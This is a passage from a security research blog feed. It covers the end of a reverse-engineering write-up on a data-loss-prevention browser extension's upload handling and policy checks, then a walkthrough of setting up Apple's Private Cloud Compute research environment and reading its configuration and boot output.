    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> e = <span class="hljs-number">0</span>; e &lt; c.raw.length; e++) {
        <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw[e].bytes) {
            u = <span class="hljs-literal">null</span> == u ? c.raw[e].bytes : (
                t = <span class="hljs-keyword">new</span> <span class="hljs-built_in">ArrayBuffer</span>(u.byteLength + c.raw[e].bytes.byteLength),
                n = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(t),
                a = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(u),
                o = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Uint8Array</span>(c.raw[e].bytes),
                n.set(a, <span class="hljs-number">0</span>),
                n.set(o, a.length),
                t
            );
        } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-literal">null</span> != c.raw[e].file) {
            l += c.raw[e].file + <span class="hljs-string">"\n"</span>;
        }
    }
}
</code></pre>
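<p>The comma expression in the middle of that loop is a buffer concatenation. Pulled out into a helper it looks like the sketch below; <code>concatBuffers</code> is a hypothetical name, not one used by the extension.</p>
<pre><code class="lang-javascript">// Hypothetical helper: join two ArrayBuffers into a new one, the way the
// minified loop merges each raw chunk into the accumulated buffer.
function concatBuffers(first, second) {
    const merged = new Uint8Array(first.byteLength + second.byteLength);
    merged.set(new Uint8Array(first), 0);
    merged.set(new Uint8Array(second), first.byteLength);
    return merged.buffer;
}

const chunkA = Uint8Array.of(1, 2).buffer;
const chunkB = Uint8Array.of(3).buffer;
const joined = new Uint8Array(concatBuffers(chunkA, chunkB));
console.log(Array.from(joined)); // prints [ 1, 2, 3 ]
</code></pre>
<p>Because every chunk triggers a fresh allocation and a full copy of everything collected so far, the cost grows quickly with the number of chunks, which is worth keeping in mind when thinking about how this behaves on very large uploads.</p>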
<h2 id="heading-policy-enforcement">Policy Enforcement</h2>
<p>The extension communicates with the local server to make blocking decisions. It sends detailed metadata about each request, including the URL, status, referrer, and file information. The server's response determines whether the request should be allowed or blocked.</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">var</span> y = <span class="hljs-keyword">new</span> XMLHttpRequest;
y.open(<span class="hljs-string">"POST"</span>, I() + X, b);
y.setRequestHeader(<span class="hljs-string">"X-Email-Url"</span>, e.url);
y.setRequestHeader(<span class="hljs-string">"X-Status"</span>, e.statusCode);
y.setRequestHeader(<span class="hljs-string">"X-Referrer"</span>, e.originUrl);
y.setRequestHeader(<span class="hljs-string">"X-Initiator"</span>, e.initiator);
y.setRequestHeader(<span class="hljs-string">"X-Private"</span>, <span class="hljs-string">"false"</span>);
y.setRequestHeader(<span class="hljs-string">"X-Attach-File"</span>, btoa(<span class="hljs-built_in">unescape</span>(<span class="hljs-built_in">encodeURIComponent</span>(m))));

<span class="hljs-keyword">try</span> {
    y.send(w);
} <span class="hljs-keyword">catch</span> (e) {
    O = !<span class="hljs-number">1</span>;
}

<span class="hljs-keyword">if</span> (<span class="hljs-number">4</span> == y.readyState) {
    <span class="hljs-keyword">if</span> (<span class="hljs-number">200</span> == y.status) {
        H = y.responseText;
    } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> == y.status || <span class="hljs-number">500</span> == y.status) {
        O = !<span class="hljs-number">1</span>;
    } <span class="hljs-keyword">else</span> {
        <span class="hljs-built_in">console</span>.log(<span class="hljs-string">"POST response ERROR code: "</span> + y.status);
        H = <span class="hljs-string">"BLOCK"</span>;
    }
}
</code></pre>
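<p>The status handling at the end is easier to follow as a small decision function. This is a sketch only: <code>interpretServerReply</code> and the field names <code>verdict</code> and <code>markServerOffline</code> are hypothetical, and what the extension does once the server is flagged as offline is not visible in the snippet above.</p>
<pre><code class="lang-javascript">// Hypothetical summary of the response handling:
//   200      - use the server's answer as the verdict
//   0 or 500 - treat the local server as unavailable (O = false in the original)
//   other    - log the status and fall back to "BLOCK"
function interpretServerReply(status, responseText) {
    if (status === 200) {
        return { verdict: responseText, markServerOffline: false };
    }
    if (status === 0 || status === 500) {
        return { verdict: null, markServerOffline: true };
    }
    console.log("POST response ERROR code: " + status);
    return { verdict: "BLOCK", markServerOffline: false };
}

console.log(interpretServerReply(200, "ALLOW").verdict); // prints "ALLOW"
console.log(interpretServerReply(404, "").verdict);      // prints "BLOCK"
</code></pre>
<p>In other words, unexpected status codes fail closed: anything that is neither a success nor a recognised “server is down” code blocks the request. The <code>"ALLOW"</code> string in the usage lines is a placeholder, since the snippet only shows the <code>"BLOCK"</code> value.</p>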
<h1 id="heading-conclusions">Conclusions</h1>
<p>To be fully honest, I’m not really sure what the solution is here. Alternative approaches like proxy-based monitoring, HTTPS inspection, network drivers, or OS-level hooks fall short because they either cannot handle encrypted traffic without complex PKI infrastructure, lack browser-specific context, or miss operations happening within the browser sandbox.</p>
<p>But what I can say is that DLP solutions are often employed by overly paranoid workplaces seeking to monitor their users’ behavior. And instead of pitching their capabilities to protect data from leaking or being exposed publicly, many DLP vendors tout more… creative ways to use their product.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1735657671103/98df7c54-d238-42c2-92ee-2148f1dcda45.jpeg" alt class="image--center mx-auto" /></p>
<p>Limiting what people can read on Twitter? Blocking likes on Facebook? What business or security case can you make for doing such things? It’s very clear who these tools are marketed towards, and they’re not even hiding it. I also take issue with the fact that they’re pitching these to firms who wanna install them on the personal devices of workers, which is a whole other can of worms.</p>
<p>Honestly, the solution is just don’t use these things. Trust me, there is no business case to spy on my three hour doomscrolling session.</p>
]]></content:encoded></item><item><title><![CDATA[Peeking Inside Apple's Private Cloud Compute]]></title><description><![CDATA[Cover Illustration by onigiriice———————————————————————————————————————
The article contains partial content similar to Matteyeux’s article on the PCC VRE, for more observations about the firmware and its debuggability see the article here

During th...]]></description><link>https://research.meekolab.com/peeking-inside-apples-private-cloud-compute</link><guid isPermaLink="true">https://research.meekolab.com/peeking-inside-apples-private-cloud-compute</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 14 Nov 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1732169524167/e80d5f1c-3969-49ca-889b-63cbc686be28.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by onigiriice</em></strong><br />———————————————————————————————————————</p>
<p>The article contains partial content similar to Matteyeux’s article on the PCC VRE, for more observations about the firmware and its debuggability see the article <a target="_blank" href="https://blog.matteyeux.com/posts/pcc/">here</a></p>
</blockquote>
<p>During the development of the iPhone 5s, Apple wanted to offer biometric login through a fingerprint scanner. They had already bought the <a target="_blank" href="https://www.reuters.com/article/us-authentec-acquisition-apple-idUSBRE86Q0KD20120727/">provider of the hardware</a> that would eventually become Touch ID, but still needed a way to store the biometric data securely. If people were gonna hand over their fingerprints, they needed to be convinced the data would be safe, unless Apple <a target="_blank" href="https://www.youtube.com/watch?v=BO8Uy2-t1Mk">wanted a PR nightmare</a>.</p>
<p>Thus they created the Secure Enclave Processor (SEP), which was built around a dedicated ARMv7a "Kingfisher" core, completely separate from the main application processor (it was not ARM TrustZone, <a target="_blank" href="https://dl.acm.org/doi/abs/10.1145/3308755.3308761">contrary to some accounts</a>). The SEP's isolation ensures that even EL3 (highest privilege level) on the main processor cannot access the Secure Enclave.</p>
<p>Over time, the responsibilities of the Secure Enclave <a target="_blank" href="https://support.apple.com/guide/security/secure-enclave-sec59b0b31ff/web">grew</a> to include storing banking credentials for Apple Pay, deploying secure memory regions for trusted execution, secure boot, encryption acceleration, and many more. Today, storing sensitive data there feels like second nature, and we trust its security.</p>
<p>With the advent of Generative AI, companies have been rushing to implement LLMs and Image Generation technologies with <a target="_blank" href="https://www.malwarebytes.com/blog/news/2024/06/microsoft-recall-delayed-after-privacy-and-security-concerns">little to no concern for privacy</a>. Apple is suddenly thrust into the same dilemma they faced in 2013, as a <a target="_blank" href="https://www.pewresearch.org/short-reads/2023/10/18/key-findings-about-americans-and-data-privacy">Pew Research Center survey</a> found that 70% of people have little to no trust in companies to make responsible decisions about how they use AI in their products, and 81% say the information companies collect will be used in ways that people are not comfortable with.</p>
<h1 id="heading-early-leaps-later-bottlenecks">Early Leaps, Later Bottlenecks</h1>
<p>Apple has prided itself on using less memory than its competitors, thanks to its investment in efficient memory management on its Darwin-based platforms, which use Automatic Reference Counting (ARC) as opposed to Android’s use of regular Garbage Collection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729860817329/6f91d19b-d73a-4946-a35f-d3b68a4b3689.png" alt class="image--center mx-auto" /></p>
<p>ARC works by having the compiler automatically insert the calls that retain and release objects (memory) exactly when they are needed or no longer used. There is overhead to this bookkeeping. However, you end up allocating only what you need, and deallocation occurs in a very predictable manner so as not to interrupt the performance of other processes. GC, on the other hand, uses an asynchronous process that periodically runs collection cycles to check which memory can be deallocated.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729861981448/9a62cdfa-f4ad-4f30-8be7-cb7b0114e39e.png" alt class="image--center mx-auto" /></p>
<p>This is why iPhones for years have been comfortable with 6 GB of RAM, while flagship Android devices have hit <a target="_blank" href="https://www.wired.com/review/google-pixel-9-pixel-9-pro-and-pixel-9-pro-xl/#:~:text=16%20GB%20RAM-,Tensor%20G4%20with%2016%20GB%20RAM,-Storage%3A">16 GB</a> and even <a target="_blank" href="https://www.gsmarena.com/honor_90_gt_debuts_with_snapdragon_8_gen_2_and_up_to_24gb_ram-news-61001.php">24 GB</a> of RAM. But this came back to bite them when they wanted to start doing on-device AI inference, which is notoriously memory hungry. Despite efforts like <a target="_blank" href="https://huggingface.co/apple/OpenELM">OpenELM</a>, Apple still cannot escape the need to run models in the cloud.</p>
<p>While hardware keeps advancing, it’s likely that advances in LLMs and ImageGen technologies will outpace what can be run on battery-powered mobile devices. Separating data from ML models is hard, because ML models <a target="_blank" href="https://arxiv.org/abs/1802.08232">memorize data encoded in their weights</a> as part of training. Several approaches are currently being pursued to do this, such as:</p>
<ul>
<li><p><a target="_blank" href="https://arxiv.org/pdf/1912.03817">Machine Unlearning</a>, which is a scheme to remove data from a model. Unfortunately, <a target="_blank" href="https://www.usenix.org/system/files/sec22fall_thudi.pdf">further work</a> has shown that unlearning cannot be formally proven by just querying a model</p>
</li>
<li><p><a target="_blank" href="https://web.archive.org/web/20240812213844/https://securecomputation.org/docs/pragmaticmpc.pdf">Secure Multi-Party Computation</a> (SMC), which enables multiple parties to jointly do inference with private data without revealing the actual data to each other through cryptographic protocols, but this requires significant computational overhead</p>
</li>
<li><p><a target="_blank" href="https://dl.acm.org/doi/10.1145/1536414.1536440">Homomorphic Encryption</a> (HE), which is a method to do complex mathematical operations (including inference) on encrypted data without compromising the encryption. This field has received a lot of attention, with scalable solutions like the <a target="_blank" href="https://machinelearning.apple.com/research/homomorphic-encryption">Brakerski-Fan-Vercauteren Scheme</a> being used by Apple on some smaller ML workloads</p>
</li>
<li><p>Confidential Computing, which is the isolation of data and workloads within a protected central processing unit (CPU) while they are being processed. This is the solution favored by giants like Google and Apple, and it will be the focus of today’s article</p>
</li>
</ul>
<h1 id="heading-private-cloud-compute">Private Cloud Compute</h1>
<p>Private Cloud Compute (PCC) was created to solve this very issue: a way to run stateless inference in the cloud. This means that while your data goes to the cloud, the data and the model itself won’t be accessible or used for further AI training.</p>
<p>As stated on the website itself, PCC has a few key design goals:</p>
<ul>
<li><p><strong>Stateless computation</strong>: Use personal data only for the immediate task, then delete it completely. No storing or saving allowed</p>
</li>
<li><p><strong>Enforceable guarantees</strong>: All parts of the system must be verifiable to ensure they're following the rules</p>
</li>
<li><p><strong>No special access</strong>: Even system administrators can't bypass privacy protections</p>
</li>
<li><p><strong>Non-targetability</strong>: Attackers shouldn't be able to target specific users - they'd have to try attacking everyone at once</p>
</li>
<li><p><strong>Verifiable transparency</strong>: Outside experts must be able to check that the system actually does what we say it does</p>
</li>
</ul>
<p>This article will attempt to dive more into the security and hardening attempts of CloudOS, but more in-depth research will probably be done by people way more talented than I am. I see myself more as a tourist than a tour guide for this topic.</p>
<p>To do so, we need to set up the PCC Virtual Research Environment (VRE), which is a part of the macOS 15.1 Developer Preview. The installation process is nearly identical, in that you will need to allow your Mac to run security research VMs, which you can configure within the RecoveryOS terminal by running the following command:</p>
<pre><code class="lang-plaintext">csrutil allow-research-guests enable
</code></pre>
<p>The tools are located in <code>/System/Library/SecurityResearch/usr/bin</code>, so you need to add this directory to your shell’s <code>PATH</code>. With iTerm I did this by putting <code>export PATH=$PATH:/System/Library/SecurityResearch/usr/bin</code> at the bottom of my <code>~/.zshrc</code> file.</p>
<p>After this you’ll need to agree to the license using <code>sudo pccvre license</code>, which grants you research usage of the code and assets within the PCC Virtual Research Environment. Uniquely, <a target="_blank" href="https://github.com/apple/security-pcc/blob/main/LICENSE">this license</a> only grants usage of the VRE for 90 days, which I’m not exactly sure how they’re going to enforce in an open-source project. After agreeing, we can interact fully with the VRE.</p>
<p>We can start by listing the releases available for download, and then downloading them. When a PCC VRE release has already been downloaded, the tool does a simple hash check to verify the integrity of the version that you have on-device. For this instance we are going to use version 1245, which was the latest version at the time of writing. The example below also shows the download of a release with a similar hash (1244) and of a release that is not yet on disk (1242).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729960823177/d16c5683-3693-4085-89f4-60b32f5d416b.png" alt class="image--center mx-auto" /></p>
<p>Then you can create an instance using <code>pccvre instance create</code>, which will show you the iBoot Serial Console output and the detailed process of the instance.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961471253/50549b51-6181-48d3-b169-e578686498bc.png" alt class="image--center mx-auto" /></p>
<p>When the <code>pccvre</code> tool is done creating an instance, the instance will be in an inactive state, so to start interacting with it you will need to spin it up. But before doing so, we can interact with the PCC VRE using the <code>darwin-init</code> tool.</p>
<pre><code class="lang-json">➜  ~ pccvre instance configure darwin-init dump -N testing
{
  <span class="hljs-attr">"apply-timeout"</span> : <span class="hljs-string">"60min"</span>,
  <span class="hljs-attr">"config-security-policy-version"</span> : <span class="hljs-number">8</span>,
  <span class="hljs-attr">"cryptex"</span> : [
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"f81cafe498a1081049be16f3c7bc58468d3cb7722aebe365632d99fc0f8a389a.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"FM_LANGUAGE_SECURITY_RESEARCH_V1"</span>
    },
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"2bd63bffc9f8fb5f6827ce5cd4dbbed05f9a7afaad50e01f6c2f71f4fa2796e5.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"PrivateCloud Support"</span>
    },
    {
      <span class="hljs-attr">"url"</span> : <span class="hljs-string">"74301a8be3c61debc1377a80b7eeebfbab36639176a5192768ebfe4ccc368a37.aar"</span>,
      <span class="hljs-attr">"variant"</span> : <span class="hljs-string">"Debug Shell for Private Cloud Security Research VM"</span>
    }
  ],
  <span class="hljs-attr">"log"</span> : {
    <span class="hljs-attr">"system-log-privacy-level"</span> : <span class="hljs-string">"Public"</span>,
    <span class="hljs-attr">"system-logging-enabled"</span> : <span class="hljs-literal">false</span>
  },
  <span class="hljs-attr">"preferences"</span> : [
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"cloudOSBuildVersion"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"3B5621j.1"</span>
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudboardd"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"GRPC"</span>,
      <span class="hljs-attr">"value"</span> : {
        <span class="hljs-attr">"ListeningIP"</span> : <span class="hljs-string">"0.0.0.0"</span>,
        <span class="hljs-attr">"UseSelfSignedCertificate"</span> : <span class="hljs-literal">true</span>
      }
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"serverOSReleaseType"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"Darwin Cloud Customer Install"</span>
    },
    {
      <span class="hljs-attr">"application_id"</span> : <span class="hljs-string">"com.apple.cloudos.cloudOSInfo"</span>,
      <span class="hljs-attr">"key"</span> : <span class="hljs-string">"cloudOSReleaseType"</span>,
      <span class="hljs-attr">"value"</span> : <span class="hljs-string">"Private cloudOS Customer"</span>
    }
  ],
  <span class="hljs-attr">"result"</span> : {
    <span class="hljs-attr">"failureAction"</span> : <span class="hljs-string">"exit"</span>
  },
  <span class="hljs-attr">"secure-config"</span> : {
    <span class="hljs-attr">"com.apple.logging.crashRedactionEnabled"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.logFilteringEnforced"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.metricsFilteringEnforced"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.logging.policyPath"</span> : <span class="hljs-string">"/private/var/PrivateCloudSupport/opt/audit-lists/customer/"</span>,
    <span class="hljs-attr">"com.apple.pcc.research.disableAppleInfrastrucutureEnforcement"</span> : <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"com.apple.tie.allowClientToOverrideConstraints"</span> : <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"com.apple.tie.allowClientToOverridePromptTemplate"</span> : <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"com.apple.tie.allowNonProdExceptionOptions"</span> : <span class="hljs-literal">false</span>
  },
  <span class="hljs-attr">"ssh"</span> : <span class="hljs-literal">true</span>,
  <span class="hljs-attr">"SSH_DISABLED-config-security-policy"</span> : <span class="hljs-string">"customer"</span>,
  <span class="hljs-attr">"user"</span> : {
    <span class="hljs-attr">"gid"</span> : <span class="hljs-number">0</span>,
    <span class="hljs-attr">"name"</span> : <span class="hljs-string">"root"</span>,
    <span class="hljs-attr">"ssh_authorized_key"</span> : <span class="hljs-string">"ssh-rsa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"</span>,
    <span class="hljs-attr">"uid"</span> : <span class="hljs-number">0</span>
  },
  <span class="hljs-attr">"userspace-reboot"</span> : <span class="hljs-string">"rem"</span>
}
</code></pre>
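<p>Since the dump is JSON, it is easy to pull out the handful of fields that matter when comparing instances. The sketch below works on a trimmed copy of the output above rather than on live CLI output; <code>summarizeDarwinInit</code> and the shape of the summary object are assumptions made for illustration.</p>
<pre><code class="lang-javascript">// Trimmed copy of the dump above; only fields shown in this article are kept.
const dumpText = `{
  "config-security-policy-version": 8,
  "cryptex": [
    { "variant": "FM_LANGUAGE_SECURITY_RESEARCH_V1" },
    { "variant": "PrivateCloud Support" },
    { "variant": "Debug Shell for Private Cloud Security Research VM" }
  ],
  "log": { "system-logging-enabled": false },
  "ssh": true
}`;

// Hypothetical helper: reduce a darwin-init dump to a short summary.
function summarizeDarwinInit(text) {
    const config = JSON.parse(text);
    return {
        policyVersion: config["config-security-policy-version"],
        cryptexVariants: config.cryptex.map(function (entry) {
            return entry.variant;
        }),
        sshEnabled: config.ssh === true,
        systemLogging: config.log["system-logging-enabled"]
    };
}

console.log(summarizeDarwinInit(dumpText));
</code></pre>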
<p>In the documentation, Apple says that the role of <code>darwin-init</code> is similar to Canonical’s cloud-init. Each PCC instance starts from a clean state with no configuration and only the base operating system, then <code>darwin-init</code> is responsible for loading additional required code and configuration from the server’s Baseboard Management Controller (BMC, similar to lights-out management solutions like HPE iLO or Dell iDRAC).</p>
<p>Configuration security is managed through the config-security-policy key, which darwin-init uses to enforce environment-specific constraints on allowable configuration options. This mechanism enables development flexibility while maintaining strict security controls in production environments.</p>
<p>The configuration policy state undergoes ratcheting into the Configuration Seal Register, making it available for verification through attestations by user devices. To maintain compatibility and simplify verification between client devices and nodes, the Configuration Seal Register contains only the policy state and specifically selected keys, rather than the complete <code>darwin-init</code> configuration. Within PCC's threat model, this configuration data is treated as attacker-controlled, with <code>darwin-init</code> permitting only configuration options that cannot compromise the system's security or privacy properties, with the safe configuration listed <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/appendix_systemconfig">here</a>.</p>
<p>The <code>darwin-init</code> configuration uses a JSON-like format, with several different things we can customize :</p>
<ul>
<li><p>Basic Configuration Parameters:</p>
<ul>
<li><p><code>apply-timeout</code> maximum time allowed for applying the configuration</p>
</li>
<li><p><code>config-security-policy-version</code> version of the security policy being used</p>
</li>
</ul>
</li>
<li><p><code>cryptex</code> lists the cryptexes to install on the node. Here we can see several of them, such as:</p>
<ul>
<li><p><code>FM_LANGUAGE_SECURITY_RESEARCH_V1</code> which is the miniaturized basic LLM model used in the PCC VRE</p>
</li>
<li><p><code>PrivateCloudSupport</code> which contains Apple’s ML stack and supports several other components</p>
</li>
<li><p><code>Debug Shell for Private Cloud Security Research VM</code> which is a custom cryptex added as part of the VRE for gaining a shell inside of the PCC node; under normal circumstances it isn’t present</p>
</li>
</ul>
</li>
<li><p><code>log</code> which is currently disabled, with the privacy level set to public; by default the PCC does not store application-level logs</p>
</li>
<li><p><code>preferences</code> Contains several important system configurations:</p>
<ul>
<li><p>cloudOSBuildVersion <code>3B5621j.1</code></p>
</li>
<li><p>GRPC configuration for <code>cloudboardd</code></p>
<ul>
<li><p>Listening on all interfaces (0.0.0.0)</p>
</li>
<li><p>Using self-signed certificates</p>
</li>
</ul>
</li>
<li><p>Server type <code>Darwin Cloud Customer Install</code></p>
</li>
<li><p>Cloud type <code>Private cloudOS Customer</code></p>
</li>
</ul>
</li>
<li><p><code>secure-config</code> which contains various security-related settings</p>
<ul>
<li><p>Crash redaction is enabled</p>
</li>
<li><p>Log and metrics filtering are enforced</p>
</li>
<li><p>Custom policy path for auditing</p>
</li>
<li><p>Certain infrastructure enforcement is disabled</p>
</li>
<li><p>TIE restrictions are in place</p>
</li>
</ul>
</li>
<li><p><code>user</code> that sets SSH with root access</p>
</li>
<li><p><code>userspace-reboot</code> is set to "rem" (Restricted Execution Mode)</p>
</li>
<li><p>Failure action is set to "exit"</p>
</li>
</ul>
<p>Aside from the <code>Debug Shell for Private Cloud Security Research VM</code> cryptex, all of these settings are vanilla and should reflect what is being run on production Apple PCC nodes. These parameters are customizable in the PCC VRE, however, including options to downgrade certain security protections and to enable log collection through the <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/vreresearchvariant">research variant</a>. The <a target="_blank" href="https://security.apple.com/documentation/private-cloud-compute/vreinteraction">VRE Interaction Manual</a> also lists ways to gather security telemetry and observability metrics for the PCC through a special configuration for the PCC VRE instance that is editable via the <code>darwin-init</code> tool.</p>
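<p>To make the structure above a bit more concrete, here is a minimal sketch of how one might summarize a <code>darwin-init</code> document when reviewing it. Only the top-level key names come from the configuration discussed above; the nested <code>variant</code> field, the sample values, and the <code>summarize</code> helper are assumptions made for illustration.</p>

```python
import json

# Hypothetical, heavily trimmed darwin-init document. The top-level key names
# follow the article; the nested "variant" field and all values are placeholders.
SAMPLE_CONFIG = """
{
  "apply-timeout": "60min",
  "config-security-policy-version": 8,
  "cryptex": [
    {"variant": "FM_LANGUAGE_SECURITY_RESEARCH_V1"},
    {"variant": "PrivateCloudSupport"},
    {"variant": "Debug Shell for Private Cloud Security Research VM"}
  ],
  "user": {"gid": 0, "name": "root", "uid": 0},
  "userspace-reboot": "rem"
}
"""


def summarize(config_text: str) -> dict:
    """Pull out the settings a reviewer would probably look at first."""
    config = json.loads(config_text)
    user = config.get("user", {})
    return {
        "cryptexes": [c.get("variant") for c in config.get("cryptex", [])],
        "root_ssh_user": user.get("uid") == 0,
        "enters_rem": config.get("userspace-reboot") == "rem",
    }


summary = summarize(SAMPLE_CONFIG)
print(summary)
```

<p>A summary like this makes it easy to spot the one non-vanilla item, the debug shell cryptex, before starting the instance.</p>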
<p>When you’re done setting up your instance build, you can start the instance using the <code>pccvre instance start</code> command.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961601422/0f494fc5-aedf-4278-a4dc-d46f00400b44.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742603258/5ef380f2-9230-4569-8d6f-45ef65fe09a4.jpeg" alt class="image--center mx-auto" /></p>
<p>At a high level, the initial stage begins when Boot ROM validates the Image4 boot manifest, known as the APTicket. The APTicket implements cryptographic device personalization through SoC-specific binding using hardware identifiers and TSS-managed rotating anti-replay values. The manifest follows Apple's ASN.1-based Image4 specification, with measurements signed by Apple's Root CA and verified against the public key embedded in Boot ROM.</p>
<p>The Boot ROM's validation sequence performs cryptographic measurements of both iBoot and SEP firmware components through secure hash computations. These measurements must correspond exactly to the signed values in the APTicket manifest. The verification process encompasses ASN.1 structure validation, Root CA signature chain verification, and hardware-specific personalization validation including device identifiers (CPID, ECID) and anti-replay nonce verification.</p>
<p>The manifest validation enforces hardware-binding through cryptographic personalization where device-specific variables (ECID, CPID, anti-replay nonces) are incorporated into the signature verification process. This binding ensures APTickets are non-transferable between devices and prevents replay attacks through the TSS-managed rotating values.</p>
<p>Upon successful verification, Boot ROM locks the measurements into two hardware registers:</p>
<ul>
<li><p><code>SEAL_DATA_A</code> for the AP chain measurements</p>
</li>
<li><p><code>SEAL_DATA</code> for SEP measurements</p>
</li>
</ul>
<p>These registers are write-once, creating an immutable record of the verified boot state that becomes integral to the device's attestation system. Only after this verification does the Boot ROM transfer execution control to iBoot. The SEAL register values, combined with other hardware-derived keys and measurements, form the basis for subsequent attestation operations through the Public Key Accelerator (PKA), enabling remote verification of the device's secure boot state.</p>
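<p>The measure, compare, then lock flow described above can be modelled in a few lines. This is a toy sketch and not Apple's implementation: the <code>WriteOnceRegister</code> class, the <code>verify_and_seal</code> helper, and the use of SHA-384 as the measurement hash are all assumptions.</p>

```python
import hashlib


class WriteOnceRegister:
    """Toy model of a hardware register that accepts exactly one write."""

    def __init__(self, name: str):
        self.name = name
        self._value = None

    def lock(self, value: bytes) -> None:
        if self._value is not None:
            raise PermissionError(f"{self.name} is already locked")
        self._value = value

    @property
    def value(self):
        return self._value


def measure(image: bytes) -> bytes:
    # SHA-384 is an assumption; the article only says "secure hash".
    return hashlib.sha384(image).digest()


def verify_and_seal(image: bytes, expected: bytes, register: WriteOnceRegister) -> bool:
    """Seal the measurement only if it matches the signed manifest value."""
    digest = measure(image)
    if digest != expected:
        return False
    register.lock(digest)
    return True


iboot = b"placeholder iBoot image bytes"
manifest_digest = measure(iboot)  # stands in for the signed APTicket value

seal_a = WriteOnceRegister("SEAL_DATA_A")
ok = verify_and_seal(iboot, manifest_digest, seal_a)
tampered_ok = verify_and_seal(b"tampered image", manifest_digest,
                              WriteOnceRegister("scratch"))
print(ok, tampered_ok)
```

<p>The point of the write-once behaviour is that later boot stages can read the sealed measurement but can never replace it with a more convenient one.</p>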
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1729961601422/0f494fc5-aedf-4278-a4dc-d46f00400b44.png" alt class="image--center mx-auto" /></p>
<p>iBoot is Apple's proprietary bootloader. This particular readout appears to be from a specialized research or development unit, as indicated by the identifier "vresearch101" in its name. The presence of "Supervisor" in the header suggests this might be running in a privileged or administrative mode.</p>
<p>The boot process shown here is occurring locally on Board 0x90, which is referenced both in the board identification line and in the USB serial number details. The system appears to be running a release build of iBoot version 11881.40.153, suggesting this is a stable, production-ready version. Each boot instance is assigned a unique UUID (<code>81FBADC5-D014-3532-93C1-6D6B119F012C</code>), which helps in tracking and identifying specific boot sessions.</p>
<p>The most detailed information comes from the USB serial number line, which contains several critical identifiers about the hardware. The Chip ID (<code>CPID:FE01</code>) identifies the specific model of Apple silicon being used, while the <a target="_blank" href="https://support.apple.com/en-mz/guide/security/secf683e0b36/web#:~:text=Site%20Map-,Exclusive%20Chip%20Identification%20\(ECID\),identifier%20that%E2%80%99s%20unique%20to%20the%20processor%20in%20each%20iPhone%20or%20iPad.">Exclusive Chip ID</a> (<code>ECID:947A770F7EAB271B</code>) provides a unique identifier for this particular chip - similar to a serial number but at the silicon level. The system's security configuration is indicated by various markers including the Secure Domain (<code>SDOM:01</code>), Security Epoch (<code>SCEP:01</code>), and iBoot flags (<code>IBFL:3D</code>).</p>
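<p>If you want to pull these identifiers out programmatically, a small parser is enough. The sketch below assumes the serial string is a whitespace-separated list of <code>KEY:VALUE</code> tokens and only uses the fields quoted above; the real string carries more fields, and <code>parse_usb_serial</code> is a hypothetical helper.</p>

```python
def parse_usb_serial(serial: str) -> dict:
    """Split a 'KEY:VALUE KEY:VALUE ...' string into a dictionary."""
    fields = {}
    for token in serial.split():
        key, sep, value = token.partition(":")
        if sep and value:
            fields[key] = value
    return fields


# Only the fields quoted in the article; the real string contains more.
serial = "CPID:FE01 ECID:947A770F7EAB271B SDOM:01 SCEP:01 IBFL:3D"
fields = parse_usb_serial(serial)

ecid = int(fields["ECID"], 16)                          # ECID as an integer
ibfl_bits = format(int(fields["IBFL"], 16), "08b")      # flag byte as a bit string
print(fields["CPID"], hex(ecid), ibfl_bits)
```

<p>Printing <code>IBFL</code> as a bit string is just a convenience for comparing flag values between boots; this sketch makes no claim about what each bit means.</p>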
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1730742642466/2924328a-9e5d-47a6-905c-32366f0454cf.jpeg" alt class="image--center mx-auto" /></p>
